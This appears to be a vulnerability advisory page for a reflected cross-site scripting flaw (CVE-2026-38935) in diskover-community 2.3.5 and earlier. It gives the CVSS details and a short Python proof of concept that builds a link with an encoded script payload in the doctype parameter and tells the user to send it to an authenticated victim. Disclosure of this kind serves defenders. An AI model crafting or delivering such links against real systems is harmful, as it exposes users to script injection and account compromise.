A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/view.php via the doctype parameter
CVSS Details
CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
diskover-community <= 2.3.5
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Code for CVE-2026-38935
# Reflects XSS via the 'doctype' parameter in public/view.php
import urllib.parse
# Target URL structure
target_base = "http://target-host/diskover/public/view.php"
# Malicious payload to inject JavaScript
xss_payload = "<script>alert('CVE-2026-38935_PoC');</script>"
# Encode payload for URL
encoded_payload = urllib.parse.quote(xss_payload)
# Construct the full malicious URL
malicious_link = f"{target_base}?doctype={encoded_payload}"
print(f"[+] Exploit Link: {malicious_link}")
print("[+] Send this link to an authenticated user to trigger the XSS.")